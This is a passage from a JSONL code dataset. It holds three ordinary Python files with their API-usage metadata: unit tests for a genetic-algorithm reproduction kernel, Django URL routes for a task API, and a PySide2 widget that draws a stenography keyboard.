"stac_pydantic.shared.MimeTypes.json", "line_number": 72, "usage_type": "attribute"}, {"api_name": "stac_pydantic.shared.MimeTypes", "line_number": 72, "usage_type": "name"}, {"api_name": "stac_pydantic.links.Relations.parent", "line_number": 76, "usage_type": "attribute"}, {"api_name": "stac_pydantic.links.Relations", "line_number": 76, "usage_type": "name"}, {"api_name": "stac_pydantic.shared.MimeTypes.json", "line_number": 77, "usage_type": "attribute"}, {"api_name": "stac_pydantic.shared.MimeTypes", "line_number": 77, "usage_type": "name"}, {"api_name": "stac_pydantic.links.Relations.self", "line_number": 81, "usage_type": "attribute"}, {"api_name": "stac_pydantic.links.Relations", "line_number": 81, "usage_type": "name"}, {"api_name": "stac_pydantic.shared.MimeTypes.json", "line_number": 82, "usage_type": "attribute"}, {"api_name": "stac_pydantic.shared.MimeTypes", "line_number": 82, "usage_type": "name"}, {"api_name": "urllib.parse.urljoin", "line_number": 83, "usage_type": "call"}, {"api_name": "stac_fastapi.types.stac.Collections", "line_number": 86, "usage_type": "call"}, {"api_name": "stac_fastapi.types.stac.Collections", "line_number": 52, "usage_type": "name"}, {"api_name": "stac_fastapi.types.errors.NotFoundError", "line_number": 99, "usage_type": "call"}, {"api_name": "stac_fastapi.types.stac.Collection", "line_number": 91, "usage_type": "name"}, {"api_name": "stac_fastapi.types.stac.ItemCollection", "line_number": 103, "usage_type": "name"}, {"api_name": "stac_fastapi.types.errors.NotFoundError", "line_number": 149, "usage_type": "call"}, {"api_name": "stac_fastapi.types.stac.Item", "line_number": 142, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 176, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 176, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 177, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 177, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 178, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 178, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 179, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 179, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 179, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 180, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 181, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 182, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 183, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 183, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 184, "usage_type": "name"}, {"api_name": "stac_fastapi.types.stac.ItemCollection", "line_number": 186, "usage_type": "name"}, {"api_name": "stac_fastapi.types.search.BaseSearchPostRequest", "line_number": 238, "usage_type": "name"}, {"api_name": "stac_fastapi.types.stac.ItemCollection", "line_number": 239, "usage_type": "name"}, {"api_name": "attr.s", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "39906581774", "text": "\"\"\"Tests for kernel/reproduction.h\n\nThese tests are meant to document behavior and provide basic validation.\n\"\"\"\n\nimport random\nimport unittest\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport gif_files\nfrom kernel import (\n breed_population,\n Cell, GenotypeDType,\n CELLS_PER_STAMP, CROSSOVER_RATE, MUTATION_RATE, NUM_GENES, STAMP_SIZE)\nfrom evolution import TestClade, NUM_SPECIES, NUM_TRIALS, NUM_ORGANISMS\nfrom tests import test_case\n\n\ndef visualize_genotype(genotype):\n \"\"\"Render a Genotype as a plt figure with images.\"\"\"\n cols = NUM_GENES\n fig = plt.figure(\"Genotype\")\n for gene_index in range(cols):\n axis = fig.add_subplot(2, cols, gene_index + 1)\n # Make a primitive bar chart representing the Scalar genes\n # that's the same width and appearance as a Stamp gene value.\n scale_factor = (1 << 32) / STAMP_SIZE\n raw_value = genotype['scalar_genes'][gene_index]\n scaled_value = int(raw_value / scale_factor)\n scalar_viz = np.pad(\n np.full((2, scaled_value), 0x00, dtype=np.uint8),\n ((0, 0), (0, STAMP_SIZE - scaled_value)),\n constant_values=0xFF)\n gif_files.add_simulation_data_to_figure(scalar_viz, fig, axis)\n axis.set_title(f'{100 * raw_value / (0xFFFFFFFF):0.2f}%')\n for gene_index in range(cols):\n axis = fig.add_subplot(2, cols, cols + gene_index + 1)\n gif_files.add_simulation_data_to_figure(\n genotype['stamp_genes'][gene_index], fig, axis)\n\n\nclass TestReproduction(test_case.TestCase):\n \"\"\"Tests for initializing and breeding populations of Genotypes.\"\"\"\n\n def test_randomize(self):\n \"\"\"Random genes have the expected distributional properties.\"\"\"\n clade = TestClade()\n clade.populate_simulator()\n genotypes = clade.simulator.get_genotypes()\n # For every trial, look at the genes of all the organisms in that\n # population and make sure they are randomized appropriately.\n for species_index in range(NUM_SPECIES):\n for trial_index in range(NUM_TRIALS):\n organism_genotypes = genotypes[species_index][trial_index]\n scalar_values = organism_genotypes['scalar_genes'].flatten()\n stamp_values = organism_genotypes['stamp_genes'].flatten()\n msg = f'species {species_index}, trial {trial_index}'\n # Scalar genes are 50% of their max value, on average.\n self.assertProportional(\n 1 << 31, scalar_values.mean(), delta=0.11, msg=msg)\n # Scalar gene values are almost all unique, since few values\n # are being drawn from the full range of 32-bit ints.\n self.assertAlmostEqual(\n NUM_ORGANISMS * NUM_GENES,\n np.unique(scalar_values).size,\n delta=0.01, msg=msg)\n # The average stamp value is halfway between ALIVE and DEAD.\n self.assertProportional(\n (int(Cell.DEAD) + int(Cell.ALIVE)) / 2,\n stamp_values.mean(),\n 0.2, msg=msg)\n # About half of the stamp values are ALIVE.\n self.assertProportional(\n len(stamp_values) / 2,\n np.count_nonzero(stamp_values == int(Cell.ALIVE)),\n 0.2, msg=msg)\n # All stamp values are either ALIVE or DEAD.\n self.assertEqual(\n len(stamp_values),\n np.count_nonzero(\n np.logical_or(\n stamp_values == int(Cell.ALIVE),\n stamp_values == int(Cell.DEAD))))\n\n def test_sample_random_genotypes(self):\n \"\"\"Collect visualizations of random genotypes to verify manually.\"\"\"\n num_organisms = 8\n clade = TestClade()\n clade.populate_simulator()\n genotypes = clade.simulator.get_genotypes()\n for organism_index in range(num_organisms):\n visualize_genotype(genotypes[0][0][organism_index])\n path, test_name = self.get_test_data_location()\n # SVG would be a better graphics format, but the pyplot library has\n # a bug where SVG file outputs are not deterministic.\n plt.savefig(f'{path}/{test_name}{organism_index}.png')\n plt.close()\n\n def test_reproducibility(self):\n \"\"\"The same seed produces the same pseudorandom genotypes.\"\"\"\n def single_trial():\n result = {}\n clade = TestClade()\n clade.populate_simulator()\n result['before'] = clade.simulator.get_genotypes()\n clade.simulator.propagate()\n result['after'] = clade.simulator.get_genotypes()\n return result\n num_trials = 3\n results = [single_trial() for _ in range(num_trials)]\n prototype = results.pop()\n for result in results:\n self.assertArrayEqual(\n prototype['before']['scalar_genes'],\n result['before']['scalar_genes'])\n self.assertArrayEqual(\n prototype['before']['stamp_genes'],\n result['before']['stamp_genes'])\n self.assertArrayEqual(\n prototype['after']['scalar_genes'],\n result['after']['scalar_genes'])\n self.assertArrayEqual(\n prototype['after']['stamp_genes'],\n result['after']['stamp_genes'])\n\n def test_mutations(self):\n \"\"\"Genes mutate during reproduction as expected.\"\"\"\n # Use a larger population size so we'll get enough mutations to\n # measure with some precision.\n num_species, num_trials, num_organisms = 32, 32, 32\n population_size = num_species * num_trials * num_organisms\n\n # Set all Genotype values to 0 and have every organism breed with\n # itself. Any non-zero values are the result of mutations.\n genotypes = np.zeros(\n (num_species, num_trials, num_organisms), dtype=GenotypeDType)\n parent_selections = list(range(population_size))\n mate_selections = parent_selections\n\n # Actually do the breeding\n genotypes = breed_population(\n genotypes, parent_selections, mate_selections)\n scalar_values = genotypes['scalar_genes'].flatten()\n stamp_values = genotypes['stamp_genes'].flatten()\n\n # Assert mutation rate is as expected.\n self.assertProportional(\n MUTATION_RATE * NUM_GENES * population_size,\n np.count_nonzero(scalar_values),\n delta=0.1)\n alive_probability = 0.5\n self.assertProportional(\n (MUTATION_RATE * NUM_GENES * CELLS_PER_STAMP *\n population_size * alive_probability),\n np.count_nonzero(stamp_values),\n delta=0.1)\n\n def test_crossover(self):\n \"\"\"Reproduction uses crossover at the expected rate.\"\"\"\n num_species, num_trials, num_organisms = 5, 5, 32\n half_organisms = int(num_organisms / 2)\n population_size = num_species * num_trials * num_organisms\n\n # Set up Genotypes and select organisms such that each parent has all\n # of its genes set to its max value and each mate has all its genes set\n # to a low value. Then we can see how many genes from parents and mates\n # make it through the breeding process.\n parent_selections = []\n mate_selections = []\n population_index = 0\n genotypes = np.empty(\n (num_species, num_trials, num_organisms), dtype=GenotypeDType)\n for species_index in range(num_species):\n for trial_index in range(num_trials):\n for organism_index in range(num_organisms):\n genotype = (\n genotypes[species_index][trial_index][organism_index])\n if organism_index < half_organisms:\n genotype['scalar_genes'].fill(0xFFFFFFFF)\n genotype['stamp_genes'].fill(0xFF)\n parent_selections.append(population_index)\n mate_selections.append(\n population_index + half_organisms)\n else:\n genotype['scalar_genes'].fill(0x00000000)\n genotype['stamp_genes'].fill(0x00)\n parent_selections.append(\n population_index - half_organisms)\n mate_selections.append(population_index)\n population_index += 1\n\n # Actually do the breeding.\n genotypes = breed_population(\n genotypes, parent_selections, mate_selections)\n scalar_values = genotypes['scalar_genes'].flatten()\n stamp_values = genotypes['stamp_genes'].flatten()\n\n # Assert that genes got remixed as expected. Note, rather than\n # computing expected values that take mutation rates into account, we\n # just set slightly looser bounds. This works pretty well since the\n # crossover rate is much greater than the mutation rate.\n # If there was no crossover, all genes come from parent. If there was\n # crossover, 50% of genes come from parent.\n parent_gene_rate = (\n (1 - CROSSOVER_RATE) + 0.5 * CROSSOVER_RATE)\n self.assertProportional(\n parent_gene_rate * NUM_GENES * population_size,\n np.count_nonzero(scalar_values),\n delta=0.02)\n self.assertProportional(\n (parent_gene_rate * NUM_GENES * CELLS_PER_STAMP * population_size),\n np.count_nonzero(stamp_values),\n delta=0.02)\n\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "ngaylinn/epigenetic-gol-v1-wip", "sub_path": "tests/test_reproduction.py", "file_name": "test_reproduction.py", "file_ext": "py", "file_size_in_byte": 9801, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "kernel.NUM_GENES", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "kernel.STAMP_SIZE", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.pad", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 33, "usage_type": "attribute"}, {"api_name": "kernel.STAMP_SIZE", "line_number": 34, "usage_type": "name"}, {"api_name": "gif_files.add_simulation_data_to_figure", "line_number": 36, "usage_type": "call"}, {"api_name": "gif_files.add_simulation_data_to_figure", "line_number": 40, "usage_type": "call"}, {"api_name": "tests.test_case.TestCase", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tests.test_case", "line_number": 44, "usage_type": "name"}, {"api_name": "evolution.TestClade", "line_number": 49, "usage_type": "call"}, {"api_name": "evolution.NUM_SPECIES", "line_number": 54, "usage_type": "argument"}, {"api_name": "evolution.NUM_TRIALS", "line_number": 55, "usage_type": "argument"}, {"api_name": "evolution.NUM_ORGANISMS", "line_number": 66, "usage_type": "name"}, {"api_name": "kernel.NUM_GENES", "line_number": 66, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 67, "usage_type": "call"}, {"api_name": "kernel.Cell.DEAD", "line_number": 71, "usage_type": "attribute"}, {"api_name": "kernel.Cell", "line_number": 71, "usage_type": "name"}, {"api_name": "kernel.Cell.ALIVE", "line_number": 71, "usage_type": "attribute"}, {"api_name": "numpy.count_nonzero", "line_number": 77, "usage_type": "call"}, {"api_name": "kernel.Cell.ALIVE", "line_number": 77, "usage_type": "attribute"}, {"api_name": "kernel.Cell", "line_number": 77, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.logical_or", "line_number": 83, "usage_type": "call"}, {"api_name": "kernel.Cell.ALIVE", "line_number": 84, "usage_type": "attribute"}, {"api_name": "kernel.Cell", "line_number": 84, "usage_type": "name"}, {"api_name": "kernel.Cell.DEAD", "line_number": 85, "usage_type": "attribute"}, {"api_name": "kernel.Cell", "line_number": 85, "usage_type": "name"}, {"api_name": "evolution.TestClade", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "evolution.TestClade", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 137, "usage_type": "call"}, {"api_name": "kernel.GenotypeDType", "line_number": 138, "usage_type": "name"}, {"api_name": "kernel.breed_population", "line_number": 143, "usage_type": "call"}, {"api_name": "kernel.MUTATION_RATE", "line_number": 150, "usage_type": "name"}, {"api_name": "kernel.NUM_GENES", "line_number": 150, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 151, "usage_type": "call"}, {"api_name": "kernel.MUTATION_RATE", "line_number": 155, "usage_type": "name"}, {"api_name": "kernel.NUM_GENES", "line_number": 155, "usage_type": "name"}, {"api_name": "kernel.CELLS_PER_STAMP", "line_number": 155, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 173, "usage_type": "call"}, {"api_name": "kernel.GenotypeDType", "line_number": 174, "usage_type": "name"}, {"api_name": "kernel.breed_population", "line_number": 195, "usage_type": "call"}, {"api_name": "kernel.CROSSOVER_RATE", "line_number": 207, "usage_type": "name"}, {"api_name": "kernel.NUM_GENES", "line_number": 209, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 210, "usage_type": "call"}, {"api_name": "kernel.NUM_GENES", "line_number": 213, "usage_type": "name"}, {"api_name": "kernel.CELLS_PER_STAMP", "line_number": 213, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 214, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 219, "usage_type": "call"}]} +{"seq_id": "26232257119", "text": "from django.urls import path\n\nfrom .views import (\n TaskListAPIView,\n TaskCreateAPIView,\n TaskDestroyAPIView,\n TaskRetrieveAPIView,\n TaskUpdateAPIView,\n )\n\napp_name = 'tasks-api'\n\nurlpatterns = [\n path('', TaskListAPIView.as_view(), name=\"tasks-list\"),\n path('create/', TaskCreateAPIView.as_view(), name=\"task-create\"),\n path('<int:pk>/detail/', TaskRetrieveAPIView.as_view(), name=\"task-detail\"),\n path('<int:pk>/update/', TaskUpdateAPIView.as_view(), name=\"task-update\"),\n path('<int:pk>/delete/', TaskDestroyAPIView.as_view(), name=\"task-delete\"),\n]\n", "repo_name": "Roman673/django-task-list", "sub_path": "tasks/api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 586, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "views.TaskListAPIView.as_view", "line_number": 14, "usage_type": "call"}, {"api_name": "views.TaskListAPIView", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "views.TaskCreateAPIView.as_view", "line_number": 15, "usage_type": "call"}, {"api_name": "views.TaskCreateAPIView", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "views.TaskRetrieveAPIView.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "views.TaskRetrieveAPIView", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "views.TaskUpdateAPIView.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "views.TaskUpdateAPIView", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "views.TaskDestroyAPIView.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "views.TaskDestroyAPIView", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "27143177204", "text": "import sys\nfrom PySide2 import QtCore, QtWidgets, QtGui\n\n\n# dimensions given in pixels\nKEY_WIDTH = 11\nKEY_HEIGHT = 11\nKEY_BOARDER = 1 # 2\nKEY_SPACING = 1 # 0\nFONT_SIZE = 8\n\n\nclass KeyPath(QtGui.QPainterPath):\n\n def __init__(self, start_point=QtCore.QPointF(0.0, 0.0), size=QtCore.QSize(KEY_WIDTH, KEY_HEIGHT)):\n super().__init__(start_point)\n\n self.start_point = start_point\n self.size = size\n self.rect = QtCore.QRectF(self.start_point, self.size)\n\n self.moveTo(start_point)\n self.addRoundedRect(self.rect, 2.0, 2.0)\n\n\nclass Key(QtWidgets.QWidget):\n\n def __init__(self, letter):\n super().__init__()\n\n self.letter = letter\n self.size_ = QtCore.QSize(KEY_WIDTH, KEY_HEIGHT)\n\n self.color = QtCore.Qt.lightGray\n\n def minimumSizeHint(self):\n return self.size_ + QtCore.QSize(KEY_BOARDER, KEY_BOARDER)\n\n def sizeHint(self):\n return self.size_ + QtCore.QSize(KEY_BOARDER, KEY_BOARDER)\n\n def set_color(self, color):\n self.color = color\n self.update()\n\n # TODO implement proper color management using QPalette\n # def mousePressEvent(self, event):\n # self.setBackgroundRole(QtGui.QPalette.Base)\n # if self.color == QtCore.Qt.gray:\n # self.set_color(QtGui.QColor(122, 163, 39))\n # else:\n # self.set_color(QtCore.Qt.gray)\n\n def paintEvent(self, event):\n painter = QtGui.QPainter(self)\n painter.setRenderHint(QtGui.QPainter.HighQualityAntialiasing)\n\n pen = QtGui.QPen()\n pen.setColor(QtCore.Qt.black)\n pen.setWidth(KEY_BOARDER)\n pen.setStyle(QtCore.Qt.SolidLine)\n pen.setCapStyle(QtCore.Qt.RoundCap)\n pen.setJoinStyle(QtCore.Qt.RoundJoin)\n\n painter.setPen(pen)\n\n brush = QtGui.QBrush()\n brush.setStyle(QtCore.Qt.SolidPattern)\n brush.setColor(self.color)\n\n painter.setBrush(brush)\n\n path = KeyPath(QtCore.QPointF(0.0, 0.0), self.size_)\n painter.drawPath(path)\n\n font = painter.font()\n font.setPixelSize(FONT_SIZE)\n font.setWeight(QtGui.QFont.Medium)\n painter.setFont(font)\n\n rect = path.boundingRect()\n painter.drawText(rect, QtCore.Qt.AlignCenter, self.letter)\n\n\nclass TallKey(Key):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # self.size_ = QtCore.QSize(10, 22)\n w = KEY_WIDTH\n h = 2*KEY_HEIGHT + KEY_BOARDER + KEY_SPACING\n self.size_ = QtCore.QSize(w, h)\n\n\nclass WideKey(Key):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # self.size_ = QtCore.QSize(120, 10)\n w = 10*KEY_WIDTH + 9*KEY_SPACING + 10*KEY_BOARDER\n h = KEY_HEIGHT\n self.size_ = QtCore.QSize(w, h)\n\n\nclass StenoBoard(QtWidgets.QWidget):\n\n def __init__(self):\n super().__init__()\n\n QtWidgets.QShortcut(QtGui.QKeySequence(\"Escape\"), self, self.close)\n self.resize(500, 500)\n\n self.number_bar = WideKey(\"# \") # align symbol with *-key\n\n self.s_left = TallKey(\"S\")\n self.t_left = Key(\"T\")\n self.p_left = Key(\"P\")\n self.h = Key(\"H\")\n\n self.k = Key(\"K\")\n self.w = Key(\"W\")\n self.r_left = Key(\"R\")\n\n self.a = Key(\"A\")\n self.o = Key(\"O\")\n\n self.star = TallKey(\"*\")\n\n self.e = Key(\"E\")\n self.u = Key(\"U\")\n\n self.f = Key(\"F\")\n self.p_right = Key(\"P\")\n self.l = Key(\"L\")\n self.t_right = Key(\"T\")\n self.d = Key(\"D\")\n\n self.r_right = Key(\"R\")\n self.b = Key(\"B\")\n self.g = Key(\"G\")\n self.s_right = Key(\"S\")\n self.z = Key(\"Z\")\n\n # left\n self.left_top_layout = QtWidgets.QHBoxLayout()\n self.left_top_layout.setContentsMargins(0, 0, 0, 0)\n self.left_top_layout.setSpacing(KEY_SPACING)\n self.left_top_layout.addWidget(self.t_left)\n self.left_top_layout.addWidget(self.p_left)\n self.left_top_layout.addWidget(self.h)\n\n self.left_bottom_layout = QtWidgets.QHBoxLayout()\n self.left_bottom_layout.setContentsMargins(0, 0, 0, 0)\n self.left_bottom_layout.setSpacing(KEY_SPACING)\n self.left_bottom_layout.addWidget(self.k)\n self.left_bottom_layout.addWidget(self.w)\n self.left_bottom_layout.addWidget(self.r_left)\n\n self.left_stack_layout = QtWidgets.QVBoxLayout()\n self.left_stack_layout.setContentsMargins(0, 0, 0, 0)\n self.left_stack_layout.setSpacing(KEY_SPACING)\n self.left_stack_layout.addLayout(self.left_top_layout)\n self.left_stack_layout.addLayout(self.left_bottom_layout)\n self.left_stack_layout.addWidget(QtWidgets.QWidget(), stretch=1)\n\n self.left_outer_layout = QtWidgets.QHBoxLayout()\n self.left_outer_layout.setContentsMargins(0, 0, 0, 0)\n self.left_outer_layout.setSpacing(KEY_SPACING)\n self.left_outer_layout.addWidget(self.s_left)\n self.left_outer_layout.addLayout(self.left_stack_layout)\n self.left_outer_layout.addWidget(QtWidgets.QWidget(), stretch=1)\n\n # right\n self.right_top_layout = QtWidgets.QHBoxLayout()\n self.right_top_layout.setContentsMargins(0, 0, 0, 0)\n self.right_top_layout.setSpacing(KEY_SPACING)\n self.right_top_layout.addWidget(self.f)\n self.right_top_layout.addWidget(self.p_right)\n self.right_top_layout.addWidget(self.l)\n self.right_top_layout.addWidget(self.t_right)\n self.right_top_layout.addWidget(self.d)\n\n self.right_bottom_layout = QtWidgets.QHBoxLayout()\n self.right_bottom_layout.setContentsMargins(0, 0, 0, 0)\n self.right_bottom_layout.setSpacing(KEY_SPACING)\n self.right_bottom_layout.addWidget(self.r_right)\n self.right_bottom_layout.addWidget(self.b)\n self.right_bottom_layout.addWidget(self.g)\n self.right_bottom_layout.addWidget(self.s_right)\n self.right_bottom_layout.addWidget(self.z)\n\n self.right_layout = QtWidgets.QVBoxLayout()\n self.right_layout.setContentsMargins(0, 0, 0, 0)\n self.right_layout.setSpacing(KEY_SPACING)\n self.right_layout.addLayout(self.right_top_layout)\n self.right_layout.addLayout(self.right_bottom_layout)\n self.right_layout.addWidget(QtWidgets.QWidget(), stretch=1)\n\n # home\n self.home_layout = QtWidgets.QHBoxLayout()\n self.home_layout.setContentsMargins(0, 0, 0, 0)\n self.home_layout.setSpacing(KEY_SPACING)\n self.home_layout.addLayout(self.left_outer_layout)\n self.home_layout.addWidget(self.star)\n self.home_layout.addLayout(self.right_layout)\n self.home_layout.addWidget(QtWidgets.QWidget(), stretch=1)\n\n # thumb\n self.thumb_layout = QtWidgets.QHBoxLayout()\n self.thumb_layout.setContentsMargins(0, 0, 0, 0)\n self.thumb_layout.setSpacing(KEY_SPACING)\n left_offset = 2*KEY_WIDTH + 2*KEY_BOARDER + 2*KEY_SPACING\n self.thumb_layout.addSpacerItem(QtWidgets.QSpacerItem(left_offset, 0))\n self.thumb_layout.addWidget(self.a)\n self.thumb_layout.addWidget(self.o)\n middle_offset = KEY_WIDTH + KEY_BOARDER + 2*KEY_SPACING\n self.thumb_layout.addSpacerItem(QtWidgets.QSpacerItem(middle_offset, 0))\n self.thumb_layout.addWidget(self.e)\n self.thumb_layout.addWidget(self.u)\n self.thumb_layout.addWidget(QtWidgets.QWidget(), stretch=1)\n\n # board\n self.board_layout = QtWidgets.QVBoxLayout()\n self.board_layout.setContentsMargins(0, 0, 0, 0)\n self.board_layout.setSpacing(KEY_SPACING)\n self.board_layout.addWidget(self.number_bar)\n self.board_layout.addLayout(self.home_layout)\n self.board_layout.addLayout(self.thumb_layout)\n self.board_layout.addWidget(QtWidgets.QWidget(), stretch=1)\n\n self.setLayout(self.board_layout)\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n\n steno_board = StenoBoard()\n steno_board.show()\n\n sys.exit(app.exec_())\n", "repo_name": "excalamus/t_rex_typer", "sub_path": "t_rex_typer/steno_board.py", "file_name": "steno_board.py", "file_ext": "py", "file_size_in_byte": 8129, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PySide2.QtGui.QPainterPath", "line_number": 13, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui", "line_number": 13, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QPointF", "line_number": 15, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 15, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 15, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QRectF", "line_number": 20, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 20, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 26, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 26, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 32, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 32, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 34, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 34, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 37, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 37, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 40, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 40, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 55, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 55, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 56, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui", "line_number": 56, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPen", "line_number": 58, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 58, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 59, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 59, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 61, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 61, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 62, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 62, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 63, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 63, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QBrush", "line_number": 67, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 67, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 68, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 68, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QPointF", "line_number": 73, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 73, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QFont", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui", "line_number": 78, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 82, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 82, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 92, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 92, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 102, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 102, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 105, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 105, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QShortcut", "line_number": 110, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 110, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QKeySequence", "line_number": 110, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 110, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 145, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 145, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 152, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 152, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QVBoxLayout", "line_number": 159, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 159, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 164, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 164, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 166, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 166, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 171, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 171, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 174, "usage_type": "call"}, {"api_name": 